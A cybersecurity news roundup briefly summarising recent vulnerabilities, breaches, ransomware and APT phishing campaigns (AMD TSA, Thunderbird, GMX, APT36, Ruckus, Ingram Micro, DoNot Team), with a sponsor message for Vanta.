In today’s cybersecurity news…
AMD warns of new Meltdown, Spectre-like bugs affecting CPUs
AMD disclosed a new side-channel vulnerability dubbed the Transient Scheduler Attack (TSA), affecting a wide range of its chips, including Ryzen and EPYC processors. The individual flaws are rated low to medium severity, but Trend Micro and CrowdStrike both consider the threat critical due to potential kernel data leakage. The attack requires local code execution, and AMD has issued patches and recommends sysadmins update affected systems.
Multiple vulnerabilities in Mozilla Thunderbird could allow for arbitrary code execution
Multiple vulnerabilities in Mozilla Thunderbird—some rated high severity—could allow arbitrary code execution, potentially letting attackers install programs or access sensitive data, especially on systems with admin privileges. The flaws include a critical use-after-free bug and memory safety issues, though there are no known active exploits. Users are urged to update to version 140 or later, apply least-privilege principles, and follow patch management and endpoint protection best practices.
Bitcoin Depot breach exposes data of nearly 27,000 crypto users, more than $40 million stolen from GMX crypto platform
Just hours after Bitcoin Depot, a major Bitcoin ATM operator, disclosed a breach affecting nearly 27,000 users, decentralized crypto exchange GMX confirmed a $43 million theft from its platform due to an exploit. GMX says it had undergone top-tier security audits but has now suspended trading and is offering the attacker a 10% bounty for the return of stolen funds.
(Bleeping Computer, The Record)
Threat actor targeting Indian defense sector
A new report from CYFIRMA reveals Pakistani-linked APT36 is targeting India’s defense sector with a phishing campaign exploiting BOSS Linux, widely used in Indian government systems. The attack uses ZIP files containing malicious Linux .desktop shortcuts that download decoy PowerPoint files while deploying an ELF binary for unauthorized access. Experts warn the shift to Linux shows evolving tactics and call for stronger email filtering, endpoint monitoring, user training, and least-privilege access to counter persistent threats in government infrastructure.
Huge thanks to our sponsor, Vanta
We know that real-time visibility is critical for security, but when it comes to our GRC programs…we rely on point-in-time checks.
But more than 9,000 companies have continuous visibility into their controls with Vanta. Vanta brings automation to evidence collection across over 35 frameworks, like SOC 2 and ISO 27001.
They also centralize key workflows like policies, access reviews, and reporting, and helps you get security questionnaires done 5 times faster with AI. Now that’s…a new way to GRC.
Get started at Vanta.com/headlines
Ruckus Networks leaves severe flaws unpatched in management devices
Researchers have disclosed multiple severe vulnerabilities in Ruckus Networks’ Virtual SmartZone (vSZ) and Ruckus Network Director (RND), including hardcoded SSH keys, unauthenticated remote code execution, and weak secret management—none of which have been patched. The flaws could allow attackers full control over wireless infrastructure, especially in large-scale deployments. Carnegie Mellon’s CERT/CC says Ruckus and parent company CommScope have not responded to disclosure attempts. Until patches are released, admins are urged to isolate management interfaces and enforce secure access protocols.
The Czech Republic bans DeepSeek in state administration over cybersecurity concerns
The Czech Republic has banned Chinese AI startup DeepSeek from use in state administration over cybersecurity concerns, citing risks of unauthorized data access due to China’s data laws. The decision follows a warning from the country’s cybersecurity agency and mirrors similar moves by Italy and Australia. DeepSeek was founded in 2023 and released its first large language model the same year.
(ABC News)
Ingram Micro starts restoring systems after ransomware attack
Ingram Micro is restoring systems following a global ransomware attack by the SafePay group that hit just before July 4. The attack took down ordering systems and forced employees to work remotely. The company has resumed taking phone and email orders in multiple countries and reset all passwords and MFA. Internal systems tied to logistics and fulfillment are gradually coming back online, but full recovery is ongoing. It’s unclear if data was stolen, though SafePay is known for exfiltration in similar attacks.
DoNot APT Expands Operations, Targets European Foreign Ministries with LoptikMod Malware
Cybersecurity firm Trellix says Indian-linked APT group “DoNot Team” targeted a European foreign ministry with its custom LoptikMod malware, delivered via phishing emails impersonating defense officials. The malware, active since at least 2018, enables data exfiltration, remote access, and long-term persistence, using anti-analysis and evasion techniques. Though the campaign’s command-and-control server is now offline, the attack signals a shift in DoNot’s focus from South Asia to European diplomatic targets.